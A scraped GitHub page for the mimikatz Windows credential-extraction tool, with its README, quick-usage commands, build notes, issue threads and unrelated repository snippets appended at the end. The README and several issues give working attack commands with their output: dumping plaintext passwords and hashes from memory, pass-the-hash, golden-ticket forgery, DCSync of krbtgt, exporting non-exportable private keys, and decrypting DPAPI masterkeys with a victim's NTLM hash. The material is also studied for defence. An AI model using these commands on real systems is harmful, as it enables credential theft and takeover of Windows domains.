mimikatz is a tool I've made to learn C and make somes experiments with Windows security

Overview

mimikatz

mimikatz is a tool I've made to learn C and make somes experiments with Windows security.

It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on https://blog.gentilkiwi.com (in French, yes).

If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases

Quick usage

log
privilege::debug

sekurlsa

sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build

mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:

mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)

Synchronize!

Build the solution

  • After opening the solution, Build / Build Solution (you can change architecture)
  • mimikatz is now built and ready to be used! (Win32 / x64 even ARM64 if you're lucky)
    • you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.

ddk2003

With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)

For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.

Follow instructions:

Continuous Integration

mimikatz project is available on AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz

Its status is: AppVeyor CI status

Licence

CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

mimikatz needs coffee to be developed:

Author

  • Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
  • DCSync and DCShadow functions in lsadump module were co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a personal development, please respect its philosophy and don't use it for bad things!

Comments
  • DCSync does not work with PAM feature enabled

    DCSync does not work with PAM feature enabled

    Hi @gentilkiwi ,

    knowing that DCSync had problem with AD Recycle Bin being enabled, I tried it against a Windows Server 2016 TP5 DC with the Privileged Access Management Feature on, just out of curiosity. And guess what, it ends with error 8236 (The server does not support the requested critical extension), just as my own DSInternals does.

    The solution will involve more than just fun with flags, as it was with DRS_EXT_RECYCLE_BIN, because the updated Doc states this: GR9 (DRS_EXT_GETCHGREPLY_V9, 0x00000100): If present, signifies that the DC supports DRS_MSG_GETCHGREPLY_V9. The DRS_MSG_GETCHGREPLY_V9 message basically adds link expiration timestamp to DRS_MSG_GETCHGREPLY_V6.

    @asolino This issue most probably affects Impacket, too, though I cannot verify it right now.

    Cheers Michael

    opened by MichaelGrafnetter 14
  • ERROR kuhl_m_dpapi_chrome

    ERROR kuhl_m_dpapi_chrome

    Hello: I open this new issue about dpapi chrome.

    C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64>mimikatz.exe
    
      .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'       Vincent LE TOUX             ( [email protected] )
      '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
    
    mimikatz # log
    Using 'mimikatz.log' for logfile : OK
    
    mimikatz # privilege::debug
    Privilege '20' OK
    
    mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /unprotect
    ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)
    
    mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /protect
    ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)
    

    Chrome logins are retrievable with other tools.

    Thanks.

    opened by Papotito123 11
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

    ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

    Hi, When trying to run mimikatz through the Invoke-Mimikatz.ps1 it gives the following error:

    
      .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
     .## ^ ##.  "A La Vie, A L'Amour"
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'                                     with 20 modules * * */
    ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106
    
    mimikatz(powershell) # sekurlsa::logonpasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
    
    mimikatz(powershell) # exit
    Bye!
    
    opened by sayak-brm 11
  • Error getting passwords on windows 10 x64.

    Error getting passwords on windows 10 x64.

    mimikatz # privilege::debug
    Privilege '20' OK
    
    mimikatz # sekurlsa::logonPasswords full
    ERROR kuhl_m_sekurlsa_acquireLSA : Handle on memory (0x00000005)
    
    mimikatz # version
    mimikatz 2.1.1 (arch x64)
    Windows NT 10.0 build 14393 (arch x64)
    msvc 150030729 207
    
    mimikatz # 
    

    Help? How to properly get passwords on Windows 10. I understand it is necessary to use many commands in a .bat file, because passwords are no longer kept in memory.
    Could you share this .bat file.

    opened by chris001 11
  • DCSync fails against renamed domains

    DCSync fails against renamed domains

    Running DCSync against domains that have been renamed ends with this message:

    ERROR kuhl_m_lsadump_dcsync ; RPC Exception 0x00002191 (8593)

    That error code stands for

    The directory service cannot perform the requested operation because the servers involved are of different replication epochs (which is usually related to a domain rename that is in progress).

    Probable cause: Mimikatz does not set the DRS_EXTENSIONS_INT::dwReplEpoch value, so it always defaults to 0. But each domain rename increments this counter on DCs and if the client and the server are not in the same epoch, the server simply refuses to send replication changes.

    Possible solution: IDL_DRSBind should be called again with the epoch that the server returns in the first call, if it is not 0.

    opened by MichaelGrafnetter 10
  • Fix crypto::cng on Windows 10 x64 1909, 2004, 20H2, 21H2

    Fix crypto::cng on Windows 10 x64 1909, 2004, 20H2, 21H2

    Fix crypto::cng on Windows 10 x64 version 1909

    Was failing with error:

    ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000000))

    I found that the version of KeyIso service (ncryptprov.dll) on my Win10 x64 1909 needs the patch sequence defined in PTRN_W10_1809_SPCryptExportKey and the existing definition for KULL_M_WIN_BUILD_10_1909 did not work.

    Also added a correct patch definition for build KULL_M_WIN_BUILD_10_2004.

    crypto::cng now succeeds on both Win10 x64 1909 and 2004 for me. Non-exportable CNG private key export was successfully tested on 1909 with command crypto::certificates /systemstore:local_machine /export

    Tested with Win10 Pro x64 Version 1909 Build 18363.1556 (ncryptprov.dll 10.0.18362.1411) Also works on Win10 Pro x64 Version 2004 Build 19041.804 (ncryptprov.dll 10.0.19041.662)

    opened by hubert3 9
  • Support decrypting DPAPI Masterkey with NTLM hash

    Support decrypting DPAPI Masterkey with NTLM hash

    Added NTLM feature to the dpapi::masterkey module. Now is not necessary to previously calculate the hash. It is possible to add the /ntlm:HASH parameter directly and as a result is going to decrypt the masterkey.

    Scenario description:

    To decrypt masterkey outside the target computer, the following command has to be executed:

    dpapi::masterkey /in:"95f7be0a-11a5-442c-8da4-e8e8363e67f7" /hash:7836db5e0904989497a8dc5754a09c5b /sid:S-1-5-21-1968630676-249568448-1092335803-4158

    But this required to calculate the hash value first.

    Now, if you obtain the NTLM hash of the victim, you can specify it directly in the dpapi::masterkey module:

    dpapi::masterkey /in:"95f7be0a-11a5-442c-8da4-e8e8363e67f7" /ntlm:77111de1f970bb77c5b4c3b475854722 /sid:S-1-5-21-1968630676-249568448-1092335803-4158
    **MASTERKEYS**
      dwVersion          : 00000002 - 2
      szGuid             : {95f7be0a-11a5-442c-8da4-e8e8363e67f7}
      dwFlags            : 00000000 - 0
      dwMasterKeyLen     : 00000088 - 136
      dwBackupKeyLen     : 00000068 - 104
      dwCredHistLen      : 00000000 - 0
      dwDomainKeyLen     : 00000174 - 372
    [masterkey]
      **MASTERKEY**
        dwVersion        : 00000002 - 2
        salt             : fb229db8bf5d6f13d3c4a6dfe0d50367
        rounds           : 00004650 - 18000
        algHash          : 00008009 - 32777 (CALG_HMAC)
        algCrypt         : 00006603 - 26115 (CALG_3DES)
        pbKey            : d8e2816265a74eeb1071c2531e40c6f12b248a3842bfbc3c331cf2e7518b3e256a31367e3252278e10ea904425080cd0fcb482e6110e1b3a161cbebf1212c64a2e547759e610833b7d28d96d4d9ad0ac37a07babc96aaa6714ba8e2f75c6612a3fc73f8dffd887ff
    
    [backupkey]
      **MASTERKEY**
        dwVersion        : 00000002 - 2
        salt             : d425b604cbb85bfe37155e9eb73f2cef
        rounds           : 00004650 - 18000
        algHash          : 00008009 - 32777 (CALG_HMAC)
        algCrypt         : 00006603 - 26115 (CALG_3DES)
        pbKey            : 88deefc1164d74993982c3c25fdfdd32d1d2e2c027c503b7364b92af26df13fd2d0a9af18e7f124c1b5d8c029641fd47b8416bc0bff33e9a66a9e7b6e5c6275d120693a9d39aa16c
    
    [domainkey]
      **DOMAINKEY**
        dwVersion        : 00000002 - 2
        dwSecretLen      : 00000100 - 256
        dwAccesscheckLen : 00000058 - 88
        guidMasterKey    : {116e39f3-e091-4b58-88ff-8f232466b5d6}
        pbSecret         : f66db46578d860660d5b88063bbd4122da4c528b33b94087e1a9dacf06289253626729e7079336e0ed46df37d1d871f0d92b76fb039790a6f410fc6b44498cf3fcb571c791ec864bd1286ef29137402f0d5f28978a8e0c2c4ff3d5097d4c9a8e922d80414173391ad072f48359d407c84b5bbaa10e8e96d638294d284043f6a15d9d1af8a5b4907cd34a73b5271e75a390a6cede19d6e6f57a051da01f7a0e128cce8043c7b548aa7fd4b93faa982baff3d8abf0b46dd20bd37071551ad3d1cdadb6d21ec2e3da63181a61be31cfb9b30009c889be44c97059b84393f66ef5101f3bc95dedff0e32acc0cb6f6bc4aaccd72543325e80769d560f4c537fce57aa
        pbAccesscheck    : e6a48866d16b51023906335118d882b8e26d83f9ca99570d9f260f687743de9742c2296bba9673951735dac0b0e4f42478e1fb4af9dd8f8156266c3f8d2e5b4ce722496bb5b169a3ce1249a3675e92b68fb7623197a18c35
    
    
    
    [masterkey] with hash: 7836db5e0904989497a8dc5754a09c5b (ntlm type)
    key : 0bea4d0123f88c40a88731c914594f9d3737c19eb10c78d2f23441657bf777ee6218c65f5268481c4377f81370f88ba4b9c440e7cec74a633d0277779640a45a
    
    

    I hope this helps.

    Thanks!

    opened by riflon 8
  • mimikatz not able to dump private keys

    mimikatz not able to dump private keys

    I'm using the following command to create a self signed certificate with 'KeyExportPolicy Nonexportable' to protect private key dumping.

    Link - https://docs.microsoft.com/en-us/powershell/module/pkiclient/new-selfsignedcertificate?view=win10-ps

    PS C:>New-SelfSignedCertificate -Type Custom -Subject "CN=Patti Fuller,OU=UserAccounts,DC=corp,DC=contoso,DC=com" -TextExtension @("2.5.29.37={text}1.3.6.1.5.5.7.3.2","2.5.29.17={text}[email protected]") -KeyUsage DigitalSignature -KeyExportPolicy Nonexportable -KeyAlgorithm ECDSA_nistP256 -CurveExport CurveName -CertStoreLocation "Cert:\CurrentUser\My"

    Output from mimikatz (Windows 10) -

        Key Container  : te-f168b88b-f398-4464-82ce-e9c588cf4fbb
        Provider       : Microsoft Software Key Storage Provider
        Provider type  : cng (0)
        Type           : CNG Key (0xffffffff)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'CURRENT_USER_MY_1_Patti Fuller1.der'
    

    ERROR kull_m_crypto_exportPfx ; PFXExportCertStoreEx (0x8009000b) Private export : KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)

    I have tried using 'crypto::capi' and 'crypto::cng' to patch non-exportable keys but no luck.

    opened by 0c0c0c0c 8
  • Non-Unicode Credentials

    Non-Unicode Credentials

    Hi,

    I noticed that sekurlsa module ignores non-unicode characters and displays nothing in case either the username or the password configured differently. In the image attached, you can see a screen shot of dumping credentials, the username and password were written in Hebrew, so they do not appear in the dump.

    nopass

    opened by MrAnde7son 8
  • Remote Credential Guard  Issue

    Remote Credential Guard Issue

    Salut Benjamin,

    the new mimikatz version from Aug 12 is working with Windows Build 1607 with and without Credential Guard. :-) But we have a little issue together with Remote Credential Guard (RCG).

    We used the following setup: Source (RPC Client) Windows Build 1607 with Credential Guard protected Target Windows Build 1607 without Credential Guard We made a RPC-connection with the parameter "/remoteguard" to the target. After running mimikatz on the target machine it will crash. (See attachments) May be the problem is that the TGT-ticket on the target machine is a copy of the TGT-ticket of the source machine but without the session key. This is why the target must call back to the source to use his session key to decrypt the response from the TGS of the new service tickets.

    mimikatz-remote-cred-bug mimikatz-remote-cred-bug2

    Greetings from Germany

    Juergen

    opened by goldfinger2 8
  • Windows 7 Decrypt EFS file : Decrypt Masterkey through Credhist

    Windows 7 Decrypt EFS file : Decrypt Masterkey through Credhist

    after loss all hope to decrypt some files (wich crypted by error by me, so I'dont care about the PFX file at this moment) as the famous answer for any similaire case said "If you don't have a copy of the certificate then your files are forever lost", I found the Gentil Kiwi way to create a new certificate by using Mimikatz, by following the recovery steeps I'm blocked on decrypt "masterkey", the folder Microsoft\Protect\SID should have the masterkey files is empty! In this case can I apply any workaround to get or create the masterkey file ?

    PS: the certificate appear through mmc with private key, but can't export it as PFX just on .cer or .p7b, also when I try to select the certificate through "manage EFS certificate" I get an error as "select certificate key not valid for use in specified state", I think some files has been deleted and the EFS chaine has been broken this is why even have the certificate appear I can't open the EFS file crypted on my current session account. is there any hope to create the PFX and try to decrypt these files on other user account ?

    image

    image

    Regards.

    opened by zousar09 7
  • Compile Error: LNK2001:  _SystemFunction041

    Compile Error: LNK2001: _SystemFunction041

    Any solution for the following error?

    4>kuhl_m_misc_citrix.obj : error LNK2001: símbolos externos indefinidos _SystemFunction041 4>C:\Users\User\Downloads\mimikatz\Win32\mimikatz.exe : fatal error LNK1120: 1 externo não resolvidos 4>Projeto de compilação pronto "mimikatz.vcxproj" -- FALHA.

    image image

    opened by Coleiras 1
  • Update crypto::cng for Win10 x64 20H2, 21H2, 22H2

    Update crypto::cng for Win10 x64 20H2, 21H2, 22H2

    KB updates have deployed newer versions of ncryptprov.dll independent of the major Windows build version

    Version 10.0.19041.2193 is seen on Win10 x64 20H2, 21H2, 22H2 as of 2022-11-30

    This crypto::cng patch works on that version, 10.0.19041.1620 and probably some earlier ones

    opened by hubert3 0
  • Fix potential memory leaks

    Fix potential memory leaks

    As outlined by @rachyyyy in

    https://github.com/gentilkiwi/mimikatz/issues/406 and https://github.com/gentilkiwi/mimikatz/issues/405

    Anything that calls ldap_get_dn must be freed. There are several other implementations of this method that do get freed in the codebase, so it looks like it was just missed in a couple of places.

    opened by joshterrill 0
  • Why I can't crack the local encrypt password on windows?

    Why I can't crack the local encrypt password on windows?

    image

    my environment : windows 7

    Why it occured the error "ERROR kuhl_m_dpapi_cred ; kull_m_file_readData (0x00000002)" ?

    And I want to know what't the difference between the 2 directories blow ?

    5135f4a487dfe707edd765cded5c760

    opened by leezp 0
  • Potential memory leak -03.

    Potential memory leak -03.

    Potential memory leak in kuhl_m_lsadump_dc.c line 1579. The return value of ldap_get_dn is which is szNTDSADn is not freed will cause a memory leak. Doc says "The ldap_get_dn() routine takes an entry as returned by ldap_first_entry(3) or ldap_next_entry(3) and returns a copy of the entry's DN. Space for the DN will be obtained dynamically and should be freed by the caller using ldap_memfree(3). Notes:These routines dynamically allocate memory that the caller must free."

    1662196572498

    opened by rachyyyy 2
Releases(2.2.0-20220919)
You may learn how to make successful pull requests and get your first valid open source contribution by using this repository.

Your-First-Contribution You may learn how to make successful pull requests and get your first valid open source contribution by using this repository.

Veshraj Ghimire 24 Aug 23, 2022
Make screenshot every few minutes to make your small history!

Screenlapse Fun CPP application (which isn't well-made, can be optimized) that automatically make screenshots of your screen every few minutes and sto

raywave's junk projects 3 Aug 18, 2021
weggli is a fast and robust semantic search tool for C and C++ codebases. It is designed to help security researchers identify interesting functionality in large codebases.

weggli is a fast and robust semantic search tool for C and C++ codebases. It is designed to help security researchers identify interesting functionality in large codebases.

Google Project Zero 2k Dec 28, 2022
A list of excellent resources for anyone to deepen their understanding with regards to Windows Kernel Exploitation and general low level security.

WinKernel-Resources A list of excellent resources for anyone trying to deepen their understanding with regards to Windows Kernel Exploitation and gene

Vector Security 55 Nov 12, 2022
Experiments using the RPI Zero GPU for FFT (1D and 2D)

RPI0_GPU_FFT Experiments using the RPI Zero GPU for FFT/IFFT 1D/2D For an input 4194304 (1D), the GPU was around 7X faster than np.fft.fft and np.fft.

Ricardo de Azambuja 30 Nov 15, 2022
My experiments with Linux for the Apple M1 platform, based on Asahi and Corellium patches

Linux kernel ============ There are several guides for kernel developers and users. These guides can be rendered in a number of formats, like HTML an

Danny Lin 9 Oct 24, 2021
An open collection of tools and experiments for rendering wide-gamut scene-linear data into an image for an SDR or HDR display device.

Open Display Transform An open collection of tools and experiments for rendering wide-gamut scene-linear data into an image for an SDR or HDR display

Jed Smith 127 Dec 29, 2022
macOS Endpoint Security Message Analysis Tool

Endpoint Security Message Analysis Tool - esmat esmat is a command line tool for macOS that allows you to explore the behavior of Apple's Endpoint Sec

vast limits GmbH 35 Sep 27, 2022
A FREE Windows C development course where we will learn the Win32API and reverse engineer each step utilizing IDA Free in both an x86 and x64 environment.

FREE Reverse Engineering Self-Study Course HERE Hacking Windows The book and code repo for the FREE Hacking Windows book by Kevin Thomas. FREE Book Do

Kevin Thomas 1.1k Dec 27, 2022
experiments with the Gameboy Advance serial interface

(I'm hedging my bets with this repo name. I'd want to add more serial setup tutorials. For example, I bought a bunch of Gameboy Advance wireless adapt

Ties Stuij 32 Jan 6, 2023
Fork of dsda-doom with experiments

dsda-doom-experiments This is my personal fork of dsda-doom for running experiments. This breaks demo compatibility. DO NOT USE. The current experimen

jsd1982 1 Oct 7, 2021
Experiments with plauger 'standard C library' source code

STANDARD C LIBRARY CODE DISK V. 2.0 This diskette contains all the source code from ``The Standard C Library,'' by P.J. Plauger (Englewood Cliffs, N.

Luca Bolognese 1 Oct 27, 2021
Experiments with Mozzi, mostly on SAMD21 chips

mozzi_experiments Experiments with Mozzi, mostly on SAMD21 chips Sketches eighties_dystopia - A swirling ominous wub that evolves over time Demos "eig

Tod Kurt 53 Dec 27, 2022
Klipper-dev - Kevin's development repository for Klipper experiments.

Welcome to the Klipper project! https://www.klipper3d.org/ Klipper is a 3d-Printer firmware. It combines the power of a general purpose computer with

null 13 Dec 10, 2022
Procedural Generation Experiments

Procedural Generation Experiments What is this? This application is a tool to create and paint L-System in a fully interactive and dynamic way. “But,”

Thomas Munoz 107 Sep 28, 2022
Just a password tool that I make for fun and the sake of my fascination

Note I made this in 1 day and I only have 1 years of experience, feel free to critique my spaghetti of a code. And if 15 chars of password isn't enoug

null 2 Dec 11, 2021
Simple EFI runtime driver that hooks GetVariable function and returns data expected by Windows to make it think that it's running with secure boot enabled (faking secure boot)

SecureFakePkg is a simple EFI runtime driver that hooks GetVariable function and returns data expected by Windows to make it think that it's running with secure boot enabled. In other words, it fakes secure boot status.

Samuel Tulach 80 Dec 30, 2022
Rampin - Try to make Windows preload files into RAM by memory mapping and touching them.

rampin A small C program to try keep a file or few in Windows RAM cache. For a Unix (not only Linux) alternative see vmtouch. Takes one or more filena

Błażej Roszkowski 1 Apr 11, 2022
kbuild is a build tool that works "like make" targetted at kernel/os development

kbuild : a kernel (and os) builder kbuild is a build tool that works "like make" targetted at kernel/os development Installing and building kbuild kbu

Valentin HAUDIQUET 1 Dec 11, 2021